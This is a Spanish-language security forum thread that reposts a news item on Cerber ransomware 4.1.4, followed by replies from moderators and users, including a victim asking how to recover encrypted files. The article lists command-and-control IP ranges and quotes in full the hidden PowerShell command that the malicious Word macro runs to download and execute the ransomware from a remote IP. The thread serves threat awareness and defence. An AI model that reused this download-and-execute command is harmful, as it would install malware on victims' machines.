• Registrarse
  • Iniciar sesión


  • Resultados 1 al 8 de 8

    Cerber 4.1.4 utiliza 3 rangos de IPs para conectarse con el servidor C&C

    Cerber 4.1.4 utiliza 3 rangos de IPs para conectarse con el servidor C&C Aunque parece que en la segunda mitad de 2016 el número de nuevas variantes de ransomware se ha reducido, los piratas informáticos ...

          
    1. #1
      Warrior Avatar de @JoseAsuncion
      Registrado
      sep 2012
      Ubicación
      Lima
      Mensajes
      11.597

      Cerber 4.1.4 utiliza 3 rangos de IPs para conectarse con el servidor C&C

      Cerber 4.1.4 utiliza 3 rangos de IPs para conectarse con el servidor C&C


      Aunque parece que en la segunda mitad de 2016 el número de nuevas variantes de ransomware se ha reducido, los piratas informáticos detrás de las herramientas maliciosas más conocidas no cesan en su actividad y, poco a poco, siguen haciendo sus herramientas más complejas y difíciles tanto de detectar como de bloquear una vez tiene lugar la infección. Una muestra de ello son los cambios que se han implementado en la última versión de Cerber.

      Los piratas informáticos tras el ransomware Cerber han liberado una nueva versión del mismo, la 4.1.4, la cual, además de configurar por defecto un algoritmo de cifrado más complejo, incluye una característica no vista hasta ahora en otras variantes similares: a la hora de conectarse a los servidores remotos de control para enviar la información de las víctimas, esta nueva variante de Cerber utiliza 3 rangos de direcciones IP diferentes en lugar de direcciones únicas de manera que si detección y bloqueo sea bastante más complicado.

      Los rangos de IPs a través de los cuales el ransomware se conecta al servidor de control remoto son:

      • 65.55.50.0/27
      • 192.42.118.0/27
      • 194.165.16.0/22


      Además, todas las conexiones se realizan a través del protocolo UDP.


      Cerber se distribuye en campañas de SPAM a través del correo electrónico

      A diferencia de otros piratas informáticos que utilizan webs maliciosas, falsas aplicaciones o kits de exploits, los piratas responsables de Cerber utilizan la clásica técnica del correo electrónico malicioso para llevar a cabo los ataques informáticos. Según podemos leer en Bleeping Computer, esta nueva variante suele llegar haciéndose pasar por una factura de algún comercio o alguna empresa, generalmente con un asunto similar a “RE : Invoice 257224“.

      Cuando el usuario cae en la estafa y abre la supuesta factura con Microsoft Word, el propio documento pide que se habilite el uso de macros para que este pueda cargar correctamente.


      Si el usuario permite la ejecución de dicho código, estaremos ejecutando en nuestro sistema operativo la siguiente instrucción:

      1 POWERSHELL.EXE -window hidden (New-Object System.Net.WebClient). DownloadFile('http://94.102.58.30/~trevor/winx64.exe',"$env:APPDATA\winx64.exe"); Start-Process ("$env:APPDATA\winx64.exe") - See more at: http://www.redeszone.net/2016/11/08/cerber-4-1-4-utiliza-3-rangos-ips-conectarse-servidor-cc/#sthash.nnlpXzPi.dpuf
      Como podemos ver, esta instrucción se centra principalmente en descargar el fichero “winx64.exe” (el ransomware propiamente dicho) y ejecutarlo en el sistema operativo para dar comienzo a la infección.

      Igual que en las otras versiones, este malware añade al final de cada archivo cifrado la extensión de la “MachineGuid” que se encuentra en la entrada del registro “HKLM\Software\Microsoft\Cryptography” y crea la nota de rescate para que la víctima pueda pagar y optar por recuperar sus datos.

      La mejor forma de protegerse de esta amenaza, igual que del resto, es tener siempre un antivirus actualizado capaz de detectar el fichero malicioso antes de que este se ejecute en nuestro sistema y, sobre todo, tener mucho cuidado con los correos electrónicos que recibimos y con los datos adjuntos que podemos encontrar en ellos.

      Fuente: Redes Zone
      Woaxxx
      * Síguenos en nuestro Twitter y hazte nuestro amigo en Facebook.
      * Infórmate de las ultimas amenazas de la red desde: InfoSpyware Blog
      * No se resuelven dudas por Privados ni por E-mail, ya que para eso esta el foro.

    2. #2
      FS-Admin
      Avatar de @MarceloRivero
      Registrado
      ene 2005
      Ubicación
      Miami
      Mensajes
      40.914

      Re: Cerber 4.1.4 utiliza 3 rangos de IPs para conectarse con el servidor C&C

      Ya se está viendo la versión del ransomware CERBER 4.1.5 -in the wild- sin grandes cambiaos respecto a esta 4.1.4.


      De todas maneras, la información de la nota es incorrecta ya que habla que CERBER únicamente se está distribuyendo vía email y no como otros ransomware con exploit kit, cuando dependiendo su campaña, cambia su manera de distribuirse... si principalmente por correo electrónico, pero también por otras vías y como no se puede descifrar, no hay que bajar la guardia.


      Salu2
      Marcelo Rivero
      Microsoft MVP Enterprise Security.



      * Síguenos en nuestro Twitter y hazte nuestro amigo en Facebook.
      * Infórmate de las ultimas amenazas de la red desde: InfoSpyware Blog
      * No se resuelven dudas por Privados ni por E-mail, ya que para eso esta el foro.

    3. #3
      Usuario Avatar de jesus quintero
      Registrado
      jul 2016
      Ubicación
      España
      Mensajes
      6

      Re: Cerber 4.1.4 utiliza 3 rangos de IPs para conectarse con el servidor C&C

      Buenas tardes , hace tiempo que me infecto el virus cerber.. puse los archivos en la pagina , para ver si podia reconocerlos, me decia que no, lo acabo de hacer d enuevo y me dce que si , y me manda a una pagina en ingles, de como hacerlo, y la verdad no tengo ni idea...
      ruego por favor ayuda.. pues tengo fotos hasta de mi hijo de su nacimiento, pues me infecto un disco duro externo que tenia en ese momento, disculpad las molestias, soy un ignorante de este mundo , que sigue este foro con la esperanza de algun dia recuperar los archivos encriptados..
      Ayudadme amigos.. os lo ruego..
      un abrazos a todos y gracias por leerme ..disculpad la molestia.

    4. #4
      FS-Admin
      Avatar de @MarceloRivero
      Registrado
      ene 2005
      Ubicación
      Miami
      Mensajes
      40.914

      Re: Cerber 4.1.4 utiliza 3 rangos de IPs para conectarse con el servidor C&C

      Hola Jesus, si los archivos fueron cifrados por alguna de las variantes del ransomware Cerber, no tienen recuperación salvo solo los de la primera... que tipo de extensión sufrieron tus archivos cifrados?

      Salu2

      PD//Ayer me encontré con la nueva version de este ransomware Cerber 4.1.6 y hoy ya parece que han saltado a la 5.0, aunque aun no esta confirmada.


      Marcelo Rivero
      Microsoft MVP Enterprise Security.



      * Síguenos en nuestro Twitter y hazte nuestro amigo en Facebook.
      * Infórmate de las ultimas amenazas de la red desde: InfoSpyware Blog
      * No se resuelven dudas por Privados ni por E-mail, ya que para eso esta el foro.

    5. #5
      Usuario Avatar de jesus quintero
      Registrado
      jul 2016
      Ubicación
      España
      Mensajes
      6

      Re: Cerber 4.1.4 utiliza 3 rangos de IPs para conectarse con el servidor C&C

      Muy Buenas amigo .. mis archivos solo ponen cerbr.. no pone nada de 2 ni 3..puedes ayudarme amigo.??? un garan abrazo y ml gacias por contestarme y perder el tiempo en mi.

    6. #6
      Usuario Avatar de hp_spawn
      Registrado
      mar 2008
      Ubicación
      My Home
      Mensajes
      5

      Re: Cerber 4.1.4 utiliza 3 rangos de IPs para conectarse con el servidor C&C

      Hola, una pregunta que tal vez sea muy obvia pero que me da mucha curiosidad para nunca caer en todo esto de los ransomware, ¿Al abrir un email me infecto? o ¿A la fuerza necesito abrir los archivos adjunto y/o enlaces?, esto lo pregunto para saber y asi prevenir siempre.

      Saludos.

    7. #7
      FS-Admin
      Avatar de @MarceloRivero
      Registrado
      ene 2005
      Ubicación
      Miami
      Mensajes
      40.914

      Re: Cerber 4.1.4 utiliza 3 rangos de IPs para conectarse con el servidor C&C

      Cita Originalmente publicado por jesus quintero Ver Mensaje
      Muy Buenas amigo .. mis archivos solo ponen cerbr.. no pone nada de 2 ni 3..puedes ayudarme amigo.??? un garan abrazo y ml gacias por contestarme y perder el tiempo en mi.
      En ese caso puede que se trate de la primera versión del ransomware Cerber la cual en determinados casos si se pueden desencriptar. Mira sus tus archivos se cambiaron todos por 10 caracteres aleatorios y terminando con la extensión. cerber

      Y prueba con la herramienta de TrendMicro llamada: RansomwareFileDecryptor.exe


      La descargas, la ejecutas, seleccionas CERBER y cruza los dedos.






      Cita Originalmente publicado por hp_spawn Ver Mensaje
      Hola, una pregunta que tal vez sea muy obvia pero que me da mucha curiosidad para nunca caer en todo esto de los ransomware, ¿Al abrir un email me infecto? o ¿A la fuerza necesito abrir los archivos adjunto y/o enlaces?, esto lo pregunto para saber y asi prevenir siempre.
      La respuesta es no. Si bien hay también otras vías de distribución del ransomware, la principal sigue siendo por campañas de malspam en la cual es necesario no solo abrir el correo, sino también descargar y ejecutar el archivo adjunto. Claro que para lograr esto se basan en la ingeniería social intentando engañar a sus víctimas con correos muy sugestivos que se ven confiables e invitan a ejecutar esa factura o documento que nos han enviado.



      Salu2






      PD//Cerber sigue avanzando y hasta este momento ya se encuentra en su version 5.0.1

      Marcelo Rivero
      Microsoft MVP Enterprise Security.



      * Síguenos en nuestro Twitter y hazte nuestro amigo en Facebook.
      * Infórmate de las ultimas amenazas de la red desde: InfoSpyware Blog
      * No se resuelven dudas por Privados ni por E-mail, ya que para eso esta el foro.

    8. #8
      Moderador
      Avatar de @MarioL
      Registrado
      nov 2006
      Ubicación
      Málaga - España
      Mensajes
      8.817

      Re: Cerber 4.1.4 utiliza 3 rangos de IPs para conectarse con el servidor C&C

      Cita Originalmente publicado por @MarceloRivero Ver Mensaje
      PD//Cerber sigue avanzando y hasta este momento ya se encuentra en su version 5.0.1


      A este paso van a tener que poner mejor un gestor de actualizaciones o un windows update sí que actualizan rápido estos muchachos xDD
      Invy

      * Síguenos en nuestro Twitter y hazte nuestro amigo en Facebook.
      * Infórmate de las ultimas amenazas de la red desde: InfoSpyware Blog
      * No se resuelven dudas por Privados ni por E-mail, ya que para eso esta el foro.